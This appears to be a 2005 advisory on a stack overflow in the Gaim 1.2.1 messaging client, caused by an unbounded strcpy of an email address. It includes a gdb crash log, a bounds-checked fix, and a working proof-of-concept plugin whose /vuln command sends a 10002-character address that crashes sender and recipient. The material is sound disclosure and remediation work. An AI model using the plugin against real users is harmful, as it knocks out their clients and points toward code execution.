Gaim Stack Overflow
Source: iago@valhallalegends.com  Author: Ron  Published: 2005-05-16

Gaim Stack Overflow (PoC)

Summary
"Gaim is a multi-protocol instant messaging (IM) client for Linux, BSD, MacOS X, and Windows. It is compatible with AIM and ICQ (Oscar protocol), MSN Messenger, Yahoo!, IRC, Jabber, Gadu-Gadu, SILC, GroupWise Messenger, and Zephyr networks."

A stack overflow vulnerability exists in Gaim. Exploiting it can lead to a denial of service or, potentially, arbitrary code execution.

Credit:
The information has been provided by Ron.

Details
Vulnerable Systems:
* Gaim version 1.2.1

Ron was looking at the stack overflow reported in Gaim 1.2.1. It was actually pretty trivial to find. The line that contains it looks like this:
strcpy(url_buf, gurl_buf->str);
url_buf is an 8192-byte stack buffer, and gurl_buf->str is an email address that is being displayed (user controlled), copied with no length check.

The difficulty in writing a real exploit is that the input is sanitized, so any character over 128, as well as ' ', ',', '\n', '<', and others are stripped away. This doesn't leave much to play with, although it would be possible to write an exploit under these conditions.

Another difficulty is that most chat protocols limit you to a reasonable message size, and 8192 is typically well above that size. So even if you could successfully create an exploit, you would still have to deliver it over a chat protocol that allows very long messages. The final difficulty is that you also process the URL locally when you send it, but that's not really a big deal: it would be trivial to filter it out in a plugin to make sure you don't crash yourself.
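The fix for the strcpy() pattern above, as an added example that is not Ron's or Gaim's code: the unbounded copy for contrast, a length-checked replacement that rejects anything that will not fit the 8192-byte buffer, and a constructed 10002-byte address shaped like the PoC's run through it. URL_BUF_LEN, copy_url_bounded and try_address are names chosen here, not Gaim identifiers.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define URL_BUF_LEN 8192   /* size of url_buf in Gaim 1.2.1, per the advisory */

/* The pattern the advisory describes: an unbounded strcpy into a fixed-size
 * stack buffer. Kept for contrast only; nothing in this file calls it. */
void copy_url_unbounded(char *url_buf, const char *str)
{
    strcpy(url_buf, str);   /* overflows once strlen(str) >= URL_BUF_LEN */
}

/* Hardened form: measure src without reading past dstsz bytes, reject input
 * that would not fit with its terminator, copy once. 0 = ok, -1 = rejected. */
int copy_url_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n >= dstsz)         /* no room for the '\0' (also covers dstsz == 0) */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Feed a len-byte address to the bounded copy into an URL_BUF_LEN buffer.
 * The address is constructed test data shaped like the PoC payload
 * ('A', '@', then 'A's); the advisory's plugin sends 10002 bytes. */
int try_address(size_t len)
{
    char url_buf[URL_BUF_LEN];
    char *addr = malloc(len + 1);
    int rc;
    if (addr == NULL)
        return -1;
    memset(addr, 'A', len);
    if (len > 1)
        addr[1] = '@';
    addr[len] = '\0';
    rc = copy_url_bounded(url_buf, sizeof url_buf, addr);
    free(addr);
    return rc;
}

int main(void)
{
    printf("10002 bytes: %s\n", try_address(10002) ? "rejected" : "copied");
    printf("8191 bytes:  %s\n", try_address(8191) ? "rejected" : "copied");
    return 0;
}
```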

For this example, Ron just threw together a quick plugin (based on an old plugin he wrote, which is why it's such a mess) which sends a 10002-character email address when the user types "/vuln". Gaim crashes at the address 0x41414141.

(gdb) run
Starting program: /usr/local/bin/gaim
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 24908)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 24908)]
0x41414141 in ?? ()

Proof of Concept:
// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow vulnerability
// when processing email addresses. What this basically does is segfault you when you
// do a /vuln command in a conversation, and, if you're using a protocol that allows
// a 10002-character message to go through, also segfaults the person you sent it to.
// The reason is that gaim's stack is overwritten with a whole bunch of 'A's, and
// the return address of the function ends up at 0x41414141. That's no good for
// anybody.
//
// This code should be considered public domain, and is freely modifiable/distributable
// by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This will compile vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.


#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>

#include "internal.h"
#include "gtkgaim.h"

#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"

#include "gtkplugin.h"
#include "gtkutils.h"

#define ME "1.2.1 Vuln Check"

/* Leftovers from the XMMS plugin this was based on; unused here. */
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding vulnerability."

static GaimCmdId cmd;

/* The oversized "email address". The author's shorthand below stands for the
 * 10002-character string described above ('A', '@', then 'A's). 'A' and '@'
 * survive Gaim's character filter, and the strcpy() into the 8192-byte url_buf
 * overwrites the saved return address with 0x41414141. */
static const char *code = "A@AAAA...(A*8192)...AAAAA";

/* Handler for "/vuln": sends the payload as an IM in the current conversation.
 * Gaim also renders the outgoing message locally, so the sender crashes too. */
static gboolean go(GaimConversation *conv, const gchar *cmd_name, gchar **args, gchar **error, void *data)
{
    gaim_conv_im_send(GAIM_CONV_IM(conv), code);

    return GAIM_CMD_STATUS_OK;
}

static gboolean plugin_load(GaimPlugin *plugin)
{
    /* Register "/vuln" for IM conversations only (GAIM_CMD_FLAG_IM). */
    cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT, GAIM_CMD_FLAG_IM, NULL, (GaimCmdFunc)go, "/vuln", NULL);

    return TRUE;
}

static gboolean plugin_unload(GaimPlugin *plugin)
{
    gaim_cmd_unregister(cmd);

    return TRUE;
}

static GaimPluginInfo info =
{
    GAIM_PLUGIN_MAGIC,
    GAIM_MAJOR_VERSION,
    GAIM_MINOR_VERSION,
    GAIM_PLUGIN_STANDARD,               /**< type */
    NULL,                               /**< ui_requirement */
    0,                                  /**< flags */
    NULL,                               /**< dependencies */
    GAIM_PRIORITY_DEFAULT,              /**< priority */
    NULL,                               /**< id */
    N_("1.2.1 Email Overflow Demo"),    /**< name */
    VERSION,                            /**< version */
    /** summary */
    N_(""),
    /** description */
    N_(""),
    "Ron <iago@valhallalegends.com>",   /**< author */
    "",                                 /**< homepage */

    plugin_load,                        /**< load */
    plugin_unload,                      /**< unload */
    NULL,                               /**< destroy */

    NULL,                               /**< ui_info */
    NULL,                               /**< extra_info */
    NULL,
    NULL
};

static void init_plugin(GaimPlugin *plugin)
{
}

/* The plugin symbol name is another leftover from the XMMS plugin. */
GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)
